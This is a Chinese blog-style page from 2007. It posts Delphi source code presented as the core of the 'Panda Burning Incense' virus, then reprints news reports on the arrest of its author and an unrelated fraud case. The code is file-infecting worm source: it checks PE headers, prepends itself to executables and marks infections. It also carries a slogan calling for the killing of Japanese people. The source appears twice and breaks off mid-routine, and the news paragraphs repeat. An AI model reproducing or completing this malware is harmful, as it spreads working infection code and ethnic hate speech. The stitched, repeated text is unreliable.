2007年2月16日 18:09,
熊猫烧香 - 核心源码 Delphi版本
------------------------------------
仅供研究使用!后果自行負責
代码:
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记
//我非常爱你码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?汤姆感激不尽!
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
------------------------------------
仅供研究使用!后果自行負責
代码:
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记
//我非常爱你码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?汤姆感激不尽!
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
2007年2月15日 21:05, 
Windows Media Player文件
从2006年年底到2007年年初,短短的两个多月时间,一个名为“熊猫烧香”的病毒不断入侵个人电脑、感染门户网站、击溃数据系统,给上百万个人用户、网吧及企业局域网用户带来无法估量的损失,被《2006年度中国大陆地区电脑病毒疫情和互联网安全报告》评为“毒王”。
2月12日,湖北省公安厅对外宣布:“熊猫烧香”始作俑者已被抓获归案,这起由公安部统一部署督办,湖北省公安厅副厅长黄洪亲自指挥,厅网监总队具体组织协调,仙桃市公安局主侦,武汉、宜昌、荆门等地公安机关网监部门配侦的全国首例制作、传播计算机病毒大案顺利告破。
仙桃警方在公安部、省公安厅以及全国各地,警方的协助和配合下,奔波10余天辗转全国各地行程万余公里,将涉案的6名犯罪嫌疑人全部抓获归案。目前,6名犯罪嫌疑人已被拘留。昨日,仙桃警方向记者透露了抓捕过程中的曲折故事。
“熊猫”重创互联网
2006年12月,一种神秘的新型病毒开始在互联网上大规模爆发,许多企业局域网、网吧和个人电脑遭受重创。1月中旬,省厅网监总队根据公安部公共信息网络安全监察局的部署,开始对“熊猫烧香”的制作者开展调查。
据调查,病毒作者在病毒中加入了代码“WHBOY”(武汉男孩),警方猜测病毒制作者的网名可能为“武汉男孩”。1月24日,仙桃市网监大队正式立案,并命名其为“‘1.22’制作传播计算机病毒案”。
出租屋内抓获病毒制造者
1月31日下午,省公安厅抽调武汉、宜昌、荆门等地的6名网监精英和国家计算机病毒应急处理中心的1名专家,同仙桃网监大队的全队人马齐聚省公安厅,对“1.22”案进行专案研讨,共商对策。
犯罪嫌疑人李俊在接受调查。
荆楚网(楚天都市报)(记者李波涛) 昨日,仙桃警方媒体通报:将择日在www.xt110.net网站公开“熊猫烧香”杀毒软件,供网民下载。
昨日下午1时30分,记者在仙桃某看守所见到了李俊。据其交待,制作“熊猫烧香”病毒仅用2个月,当初是为“好玩”,现在后悔不已。警方将李俊抓获后,李在看守所里写下杀毒软件程序,交给了警方。经试验,该程序能在几分钟内彻底杀灭“熊猫烧香”病毒。
2007年2月14日 00:03, 
浙江东阳26岁神秘女富豪吴英2月10日被警方刑事拘留,其所有的本色集团总部以及下属各家店铺全部被东阳警方控制。昨日本报记者从东阳官方得到证实,在刑拘吴英的同时,邻近的义乌市的4名老板也同时被刑拘。据称这四位老板也是“主要涉案人员”。
昨日下午,东阳市政府新闻办公室主任陈其宪接受本报记者采访时表示,自2月10日下午4时许,东阳市公安机关依法对本色集团采取行动后,东阳市政府立即组成专案侦查、清算核资等工作组,目前清算核资工作进展顺利。
转到吴英账上有数亿资金
昨日下午,东阳市政府新闻办公室主任陈其宪接受本报记者采访时表示,自2月10日下午4时许,东阳市公安机关依法对本色集团采取行动后,东阳市政府立即组成专案侦查、清算核资等工作组,目前清算核资工作进展顺利。
转到吴英账上有数亿资金
没有多少人知道“尼姆亚”这个官方学名,却都记住了“熊猫烧香”的卡通图案。在熬过了2007年初地震断网的光缆修复期后,1月底,中国互联网的百姓们又一次经历了一场病毒泛滥的考验。病毒不断变种成了一场无声的较量,“熊猫烧香”一夜之间变成“灯泡男孩”和“金猪满圈”,夹杂着病毒作者的恶搞情绪,反病毒软件厂商作秀般的猜疑,以及病毒从破坏者到盗贼的蜕变。湖北省公安厅12日宣布,湖北网监一举侦破了制作传播熊猫烧香病毒案,抓获李俊、雷磊等8名犯罪嫌疑人。这是我国侦破的国内首例制作计算机病毒的大案。
湖北省公安厅12日宣布,根据统一部署,湖北网监在浙江、山东、广西、天津、广东、四川、江西、云南、新疆、河南等地公安机关的配合下,一举侦破了制作传播熊猫烧香病毒案,抓获李俊(男,25岁,武汉新洲区人)、雷磊(男,25岁,武汉新洲区人)等8名犯罪嫌疑人。这是我国侦破的国内首例制作计算机病毒的大案。
【事件危害】 上百万电脑用户深受其害
据介绍,2006年底,我国互联网上大规模爆发熊猫烧香病毒及其变种,该病毒通过多种方式进行传播,并将感染的所有程序文件改成熊猫举着三炷香的模样,同时该病毒还具有盗取用户游戏账号、QQ账号等功能。该病毒传播速度快,危害范围广,截至案发为止,已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏,引起社会各界高度关注。《瑞星2006安全报告》将其列为十大病毒之首,在《2006年度中国大陆地区电脑病毒疫情和互联网安全报告》的十大病毒排行中一举成为“毒王”。
【成功侦破】 抓获李俊等8名犯罪嫌疑人
今年1月中旬,湖北省网监部门根据公安部公共信息网络安全监察局的部署,对熊猫烧香病毒的制作者开展调查。
湖北省公安厅12日宣布,根据统一部署,湖北网监在浙江、山东、广西、天津、广东、四川、江西、云南、新疆、河南等地公安机关的配合下,一举侦破了制作传播熊猫烧香病毒案,抓获李俊(男,25岁,武汉新洲区人)、雷磊(男,25岁,武汉新洲区人)等8名犯罪嫌疑人。这是我国侦破的国内首例制作计算机病毒的大案。
【事件危害】 上百万电脑用户深受其害
据介绍,2006年底,我国互联网上大规模爆发熊猫烧香病毒及其变种,该病毒通过多种方式进行传播,并将感染的所有程序文件改成熊猫举着三炷香的模样,同时该病毒还具有盗取用户游戏账号、QQ账号等功能。该病毒传播速度快,危害范围广,截至案发为止,已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏,引起社会各界高度关注。《瑞星2006安全报告》将其列为十大病毒之首,在《2006年度中国大陆地区电脑病毒疫情和互联网安全报告》的十大病毒排行中一举成为“毒王”。
【成功侦破】 抓获李俊等8名犯罪嫌疑人
今年1月中旬,湖北省网监部门根据公安部公共信息网络安全监察局的部署,对熊猫烧香病毒的制作者开展调查。
